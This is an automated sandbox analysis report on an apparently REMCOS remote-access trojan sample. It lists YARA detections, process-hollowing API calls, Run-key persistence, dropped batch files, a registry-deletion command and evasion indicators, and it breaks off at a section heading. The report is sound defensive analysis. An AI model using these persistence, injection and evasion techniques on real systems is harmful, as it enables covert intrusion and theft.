Source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\Public\Libraries\eljkarS.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers, author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006E2BE1 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_004340D5
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_00423098
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_00411205
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_0043820B
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_004223C0
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_0044D3FA
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_0043843A
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007040D5
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006F3098
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006E1205
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0070820B
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0071D3FA
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006F23C0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0070843A
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006E9521
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0070450A
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0071B5AB
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00701670
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007216E0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006FE6D5
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007037C1
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006F28B7
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0070493F
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0070FA50
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006EAAA0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00700BBE
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0071BCC9
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00703CBD
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006F2F55
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00707FDC
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_105B3233
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_105AA394
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_105C24E3
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_105BF548
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_10591638
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_105C4634
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_105B372A
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: String function: 0042F49E appears 37 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 006FF49E appears 37 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 006FFB60 appears 53 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 006D2084 appears 79 times
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle
Source: yVhvGnsUpL.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: yVhvGnsUpL.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Srakjle.exe.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Srakjle.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: yVhvGnsUpL.exe | Virustotal: Detection: 17%
Source: yVhvGnsUpL.exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | File read: C:\Users\user\Desktop\yVhvGnsUpL.exe
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\yVhvGnsUpL.exe 'C:\Users\user\Desktop\yVhvGnsUpL.exe'
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\Public\Libraries\Srakjle\Srakjle.exe 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006E3958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\Srakjlekngtcyxfikcsesbckosunxns[1]
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@23/10@75/2
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_0040D211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Windows\SysWOW64\DpiScaling.exe | Mutant created: \Sessions\1\BaseNamedObjects\Sept-AITAB5
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006E6C39 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\DpiScaling.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: yVhvGnsUpL.exe | Static file information: File size 1133568 > 1048576
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_004510A8 push eax; ret 12_2_004510C6
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_00458445 push esi; ret 12_2_0045844E
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7D3AE push edx; retf 23_3_03B7D3BC
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7CFF7 pushfd ; iretd 23_3_03B7CFFE
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7C930 push esi; ret 23_3_03B7C93D
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7EB5C push es; iretd 23_3_03B7EB5D
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7D0B8 push ebx; retf 23_3_03B7D0BA
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7C2FA pushad ; retf 23_3_03B7C2FB
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7F2E4 push esp; retf 23_3_03B7F2EF
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7F6D8 push ss; ret 23_3_03B7F6E4
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7EA3E push ebx; retf 23_3_03B7EA4B
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7E212 push ecx; iretd 23_3_03B7E213
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 23_3_03B7EE72 push eax; ret 23_3_03B7EE7B
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CB97E4 push ecx; ret 24_3_03CB9848
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CBB1FA push esi; retf 24_3_03CBB200
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CBC7B7 push es; ret 24_3_03CBC7BF
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CB917B push edx; ret 24_3_03CB917C
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CB909D push edx; iretd 24_3_03CB909E
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CB9495 push ecx; ret 24_3_03CB9496
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CBAEA2 push esp; ret 24_3_03CBAEA9
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CBC2A4 pushfd ; ret 24_3_03CBC2A8
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CB9845 push ecx; ret 24_3_03CB9848
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe | Code function: 24_3_03CBB002 push cs; ret 24_3_03CBB005
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_007210A8 push eax; ret 28_2_007210C6
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00728445 push esi; ret 28_2_0072844E
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_00720786 push ecx; ret 28_2_00720799
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006FFBA6 push ecx; ret 28_2_006FFBB9
Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: 12_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe | File created: C:\Users\Public\Libraries\Srakjle\Srakjle.exe
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_006D5C8B ShellExecuteW,URLDownloadToFileW
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_004163AD
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SrakjleJump to behavior
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SrakjleJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0040CD09
              Source: C:\Users\user\Desktop\yVhvGnsUpL.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Delayed program exit found
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_0040D0B5 Sleep,ExitProcess,12_2_0040D0B5
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006DD0B5 Sleep,ExitProcess,28_2_006DD0B5
Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 6972 - Thread sleep count: 46 > 30
Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 6972 - Thread sleep time: -46000s >= -30000s
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004160DB
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,28_2_006E60DB
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040A012
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_004061C3 FindFirstFileW,FindNextFileW,12_2_004061C3
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040A22D
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_004153F5
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006DA012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_006DA012
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006D61C3 FindFirstFileW,FindNextFileW,28_2_006D61C3
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006DA22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_006DA22D
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006E53F5 FindFirstFileW,FindNextFileW,FindNextFileW,28_2_006E53F5
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006E7754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,28_2_006E7754
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006D77EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_006D77EC
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_00716AF9 FindFirstFileExA,28_2_00716AF9
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006D7C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_006D7C55
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006D697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,28_2_006D697D
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006FF727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_006FF727
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0040CD09
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_0040F15D GetProcessHeap,OpenProcess,OpenProcess,OpenProcess,GetCurrentProcessId,OpenProcess,GetCurrentProcessId,OpenProcess,12_2_0040F15D
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_0070CB4E mov eax, dword ptr fs:[00000030h] 28_2_0070CB4E
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_1059111E mov eax, dword ptr fs:[00000030h] 28_2_1059111E
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_1059111E mov eax, dword ptr fs:[00000030h] 28_2_1059111E
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Code function: 23_3_03B80B99 LdrInitializeThunk,23_3_03B80B99
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_0042F8B9 SetUnhandledExceptionFilter,12_2_0042F8B9
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006FF8B9 SetUnhandledExceptionFilter,28_2_006FF8B9
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006FF727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_006FF727
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_00706793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00706793
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006FFD2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_006FFD2C

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
